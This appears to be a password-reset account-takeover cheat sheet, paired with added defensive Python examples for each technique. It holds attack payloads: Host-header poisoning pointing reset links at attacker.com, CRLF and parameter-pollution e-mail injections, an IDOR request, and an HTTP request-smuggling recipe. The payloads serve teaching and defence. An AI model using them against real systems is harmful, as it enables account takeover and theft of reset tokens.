```http
Host: attacker.com
X-Forwarded-Host: attacker.com
```
```http
POST https://example.com/reset.php HTTP/1.1
Accept: */*
Content-Type: application/json
Host: attacker.com
```

```
https://attacker.com/reset-password.php?token=TOKEN
```
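Defensive counterpart, added here as an example (not code from the original page): the reset link is built from a configured origin, never from the request, and a request whose `Host` or `X-Forwarded-Host` is not on the allowlist is refused. `CANONICAL_ORIGIN` and `ALLOWED_HOSTS` are assumed configuration values.

```python
# Added example (not from the original page): issue reset links from a
# server-side canonical origin instead of the request's Host header.
# CANONICAL_ORIGIN and ALLOWED_HOSTS are assumed configuration values.
from urllib.parse import urlencode

CANONICAL_ORIGIN = "https://example.com"            # assumed, from app config
ALLOWED_HOSTS = {"example.com", "www.example.com"}   # assumed allowlist


def _hostname(value: str) -> str:
    """First value of a possibly comma-joined header, port stripped, lower-cased."""
    return value.split(",")[0].strip().rsplit(":", 1)[0].lower()


def host_is_trusted(headers: dict) -> bool:
    """True only if Host, and X-Forwarded-Host when present, are allowlisted.

    A reverse proxy that legitimately sets X-Forwarded-Host should overwrite,
    not append to, the client's value; checking it here is defence in depth.
    """
    lowered = {k.lower(): v for k, v in headers.items()}
    if "host" not in lowered:
        return False
    for name in ("host", "x-forwarded-host"):
        if name in lowered and _hostname(lowered[name]) not in ALLOWED_HOSTS:
            return False
    return True


def build_reset_link(headers: dict, token: str) -> str:
    """Return the link for the reset e-mail, or raise if the Host is untrusted.

    The hostname never comes from the request, so a poisoned Host or
    X-Forwarded-Host header cannot redirect the token to another origin.
    """
    if not host_is_trusted(headers):
        raise ValueError("untrusted Host header; refusing to issue reset link")
    return f"{CANONICAL_ORIGIN}/reset-password.php?{urlencode({'token': token})}"


def reset_link_or_none(headers: dict, token: str):
    """Convenience wrapper: the link, or None when the request was rejected."""
    try:
        return build_reset_link(headers, token)
    except ValueError:
        return None


if __name__ == "__main__":
    print(reset_link_or_none({"Host": "example.com"}, "TOKEN"))
    print(reset_link_or_none({"Host": "attacker.com"}, "TOKEN"))
```

Logging the rejected `Host` value on the `ValueError` path gives a cheap detection signal for poisoning attempts against the reset endpoint.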
```powershell
# parameter pollution
[email protected]&[email protected]

# array of emails
{"email":["[email protected]","[email protected]"]}

# carbon copy
[email protected]%0A%0Dcc:[email protected]
[email protected]%0A%0Dbcc:[email protected]

# separator
[email protected],[email protected]
[email protected]%[email protected]
[email protected]|[email protected]
```
```powershell
POST /api/changepass
[...]
("form": {"email":"[email protected]","password":"securepwd"})
```
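Server-side handling that closes both the e-mail parameter tricks above (pollution, arrays, CC/BCC injection, separators) and the IDOR on `/api/changepass`, added here as an example and not code from the original page: the reset endpoint accepts exactly one well-formed address, and the change-password endpoint takes the account from the session, ignoring any `email` in the body. Request bodies, the session dict and the user table are constructed for the demonstration.

```python
# Added example (not from the original page): accept exactly one well-formed
# address in the reset request, and take the account for /api/changepass
# from the session rather than the body. Bodies, the session dict and the
# user table below are constructed for the demonstration.
import hashlib
import json
import os
import re
from urllib.parse import parse_qs

# One address: local part, '@', dotted domain. No whitespace, no ',', ';',
# '|' separators and no CR/LF that could become an extra mail header.
_SINGLE_EMAIL = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+")


def validate_email(value) -> str:
    """Return the lower-cased address or raise ValueError."""
    if not isinstance(value, str) or not _SINGLE_EMAIL.fullmatch(value):
        raise ValueError("email must be a single well-formed address")
    return value.lower()


def email_from_form(body: str) -> str:
    """Form-encoded body: reject email=a&email=b (parameter pollution)."""
    values = parse_qs(body, keep_blank_values=True).get("email", [])
    if len(values) != 1:
        raise ValueError("exactly one email parameter is required")
    return validate_email(values[0])


def email_from_json(body: str) -> str:
    """JSON body: reject {"email": ["a", "b"]} and any non-string value."""
    data = json.loads(body)
    if not isinstance(data, dict):
        raise ValueError("JSON object expected")
    return validate_email(data.get("email"))


def accepted(parser, body: str) -> bool:
    """True if `parser` accepts `body`; used to exercise the rejections."""
    try:
        parser(body)
        return True
    except ValueError:  # json.JSONDecodeError is a ValueError subclass
        return False


def change_password(session: dict, body: str, users: dict) -> str:
    """Update the password of the logged-in user and return whose it was.

    The target comes from `session`; an 'email' member in the body is
    ignored, so naming another account there changes nothing for it.
    """
    data = json.loads(body)
    if not isinstance(data, dict):
        raise ValueError("JSON object expected")
    new_password = data.get("password")
    if not isinstance(new_password, str) or len(new_password) < 12:
        raise ValueError("password must be a string of at least 12 characters")
    target = session["email"]  # never data.get("email")
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", new_password.encode(), salt, 200_000)
    users[target] = {"salt": salt, "hash": digest}
    return target


if __name__ == "__main__":
    print(accepted(email_from_form, "email=victim%40example.com&email=attacker%40evil.com"))
    print(accepted(email_from_json, '{"email":["victim@example.com","attacker@evil.com"]}'))
```

Note that the form parser counts occurrences of `email` before looking at the value: a framework that silently takes the first or last duplicate is exactly what parameter pollution relies on.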
The password reset token should be randomly generated and unique every time.
Try to determine whether the token expires or is always the same; in some cases the generation algorithm is weak and can be guessed. The following variables might be used by the algorithm.
resetToken
https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]
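What a sound reset-token lifecycle looks like on the server, added here as an example (not code from the original page): the token comes from the OS CSPRNG, only its hash is stored, it expires, and it is consumed on first use. The in-memory store and the explicit `now` clock parameter are constructed for the demonstration.

```python
# Added example (not from the original page): random, hashed-at-rest,
# expiring, single-use reset tokens. The in-memory store and the explicit
# `now` clock are constructed for the demonstration.
import hashlib
import hmac
import secrets
import time
from typing import Optional

TOKEN_TTL_SECONDS = 15 * 60
_pending = {}  # sha256(token) -> {"email": ..., "expires": ...}


def _digest(token: str) -> str:
    # Only the hash is stored, so a leaked table does not yield usable tokens.
    return hashlib.sha256(token.encode()).hexdigest()


def issue_reset_token(email: str, now: Optional[float] = None) -> str:
    """Return a fresh 256-bit token for `email`, valid for TOKEN_TTL_SECONDS.

    secrets.token_urlsafe draws from the OS CSPRNG; the value has no
    relation to the user id, e-mail, name or timestamp, so none of those
    helps in guessing it.
    """
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)
    _pending[_digest(token)] = {"email": email, "expires": now + TOKEN_TTL_SECONDS}
    return token


def redeem_reset_token(token: str, email: str, now: Optional[float] = None) -> bool:
    """Consume the token; True only if it is known, unexpired and bound to `email`."""
    now = time.time() if now is None else now
    record = _pending.pop(_digest(token), None)  # removed on any attempt: single use
    if record is None or now > record["expires"]:
        return False
    return hmac.compare_digest(record["email"].encode(), email.encode())


def lifecycle_demo() -> dict:
    """Exercise the properties a reviewer would check; returns the outcomes."""
    t0 = 1_700_000_000.0
    a = issue_reset_token("victim@example.com", now=t0)
    b = issue_reset_token("victim@example.com", now=t0)
    c = issue_reset_token("victim@example.com", now=t0)
    return {
        "unique": a != b,
        "wrong_email_rejected": not redeem_reset_token(a, "attacker@evil.com", now=t0 + 1),
        "reuse_rejected": not redeem_reset_token(a, "victim@example.com", now=t0 + 1),
        "valid_accepted": redeem_reset_token(b, "victim@example.com", now=t0 + 1),
        "expired_rejected": not redeem_reset_token(c, "victim@example.com", now=t0 + TOKEN_TTL_SECONDS + 1),
        "unknown_rejected": not redeem_reset_token("not-a-real-token", "victim@example.com", now=t0),
    }


if __name__ == "__main__":
    print(lifecycle_demo())
```

Binding the token to the e-mail address it was issued for is what defeats the `resetToken=...&email=...` swap shown above: a valid token for one account is useless with another address.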
"admin "
The platform CTFd was vulnerable to this attack.
See: CVE-2020-7245
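Defensive handling of the whitespace collision, added here as an example (not code from the original page or from CTFd): usernames are canonicalized once, at registration and at lookup, so `"admin "` and `"admin"` resolve to the same account and the second registration is refused. The user set is constructed for the demonstration.

```python
# Added example (not from the original page): canonicalize usernames so that
# "admin " (trailing space) cannot coexist with "admin". The user set is
# constructed for the demonstration.
import unicodedata
from typing import List, Optional


def canonical_username(raw: str) -> str:
    """Comparison form: NFKC-normalized, trimmed, case-folded.

    Inner whitespace and control characters are rejected rather than
    silently collapsed, so there is exactly one spelling per account.
    """
    name = unicodedata.normalize("NFKC", raw).strip().casefold()
    if not name:
        raise ValueError("empty username")
    if any(ch.isspace() or unicodedata.category(ch).startswith("C") for ch in name):
        raise ValueError("username contains whitespace or control characters")
    return name


def register(username: str, existing: set) -> str:
    """Store the canonical form, refusing anything that collides with it."""
    name = canonical_username(username)
    if name in existing:
        raise ValueError("username already taken")
    existing.add(name)
    return name


def find_user(username: str, existing: set) -> Optional[str]:
    """Look up by the same canonical form used at registration."""
    try:
        name = canonical_username(username)
    except ValueError:
        return None
    return name if name in existing else None


def register_all(usernames: List[str]) -> List[bool]:
    """Register in order against an empty table; True where the name was accepted."""
    existing = set()
    results = []
    for u in usernames:
        try:
            register(u, existing)
            results.append(True)
        except ValueError:
            results.append(False)
    return results


if __name__ == "__main__":
    print(register_all(["admin", "admin ", " admin", "ADMIN", "alice"]))
```

The same canonical form must be used on every path that resolves a username (registration, login, password reset); a reset handler that queries the raw string while registration trims it is precisely the mismatch this section describes.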
*.domain.com
Refer to the HTTP Request Smuggling vulnerability page.
1. Use smuggler to detect the type of HTTP Request Smuggling (CL, TE, CL.TE)
```powershell
git clone https://github.com/defparam/smuggler.git
cd smuggler
python3 smuggler.py -h
```
2. Craft a request which will overwrite the `POST / HTTP/1.1` with the following data:
```powershell
GET http://something.burpcollaborator.net HTTP/1.1
X:
```
3. The final request could look like the following:
```powershell
GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0
GET http://something.burpcollaborator.net HTTP/1.1
X: X
```
HackerOne reports exploiting this bug:
* https://hackerone.com/reports/737140
* https://hackerone.com/reports/771666
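Front-end check that refuses the ambiguous framing such a request depends on, added here as an example (not code from the original page or from the smuggler tool): a request carrying both `Content-Length` and `Transfer-Encoding`, conflicting lengths, or an obfuscated header is rejected before anything is forwarded. `SAMPLE_REQUEST` is a constructed request in the shape of the one above, with placeholder hostnames.

```python
# Added example (not from the original page): reject requests whose body
# framing is ambiguous before a front-end forwards them. SAMPLE_REQUEST and
# CLEAN_REQUEST are constructed for the demonstration (placeholder hosts).
import re
from typing import List, Tuple

SAMPLE_REQUEST = (
    b"GET / HTTP/1.1\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"Host: something.example\r\n"
    b"User-Agent: Smuggler/v1.0\r\n"
    b"Content-Length: 83\r\n"
    b"\r\n"
    b"0\r\n"
    b"\r\n"
    b"GET http://collaborator.example HTTP/1.1\r\n"
    b"X: X\r\n"
)

CLEAN_REQUEST = (
    b"POST / HTTP/1.1\r\n"
    b"Host: something.example\r\n"
    b"Content-Length: 5\r\n"
    b"\r\n"
    b"hello"
)


def parse_headers(raw: bytes) -> List[Tuple[str, str]]:
    """(name, value) pairs from the header block; names are kept exactly as sent."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    pairs = []
    for line in head.split(b"\r\n")[1:]:  # drop the request line
        name, sep, value = line.partition(b":")
        if not sep:
            raise ValueError("malformed header line: %r" % line)
        pairs.append((name.decode("latin-1"), value.decode("latin-1").strip()))
    return pairs


def framing_problems(raw: bytes) -> List[str]:
    """Reasons to reject the request; an empty list means the length is unambiguous.

    RFC 7230 section 3.3.3: Transfer-Encoding and Content-Length together, or
    two differing Content-Length values, mean front-end and back-end may
    disagree about where the body ends (CL.TE / TE.CL desync).
    """
    problems = []
    headers = parse_headers(raw)
    # A name such as "Transfer-Encoding " (trailing space) is typically honoured
    # by only one of the two servers; treat it as an error, not a quirk.
    if any(name != name.strip() for name, _ in headers):
        problems.append("whitespace around a header name")
    named = [(n.strip().lower(), v) for n, v in headers]
    cl = [v for n, v in named if n == "content-length"]
    te = [v for n, v in named if n == "transfer-encoding"]
    if cl and te:
        problems.append("both Content-Length and Transfer-Encoding present")
    if len(set(cl)) > 1:
        problems.append("conflicting Content-Length values")
    if any(not re.fullmatch(r"[0-9]+", v) for v in cl):
        problems.append("non-numeric Content-Length")
    # Only a plain "chunked" as the final coding is accepted.
    if len(te) > 1 or any(v.split(",")[-1].strip().lower() != "chunked" for v in te):
        problems.append("unexpected Transfer-Encoding")
    return problems


def safe_to_forward(raw: bytes) -> bool:
    """True when the request may be passed to the back-end unchanged."""
    return not framing_problems(raw)


if __name__ == "__main__":
    print(framing_problems(SAMPLE_REQUEST))
    print(framing_problems(CLEAN_REQUEST))
```

Rejecting with a 400 and closing the connection matters as much as the check itself: a front-end that drops only the offending header but keeps the connection open can still leave a prefix in the back-end's buffer.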
JSON Web Tokens might be used to authenticate a user.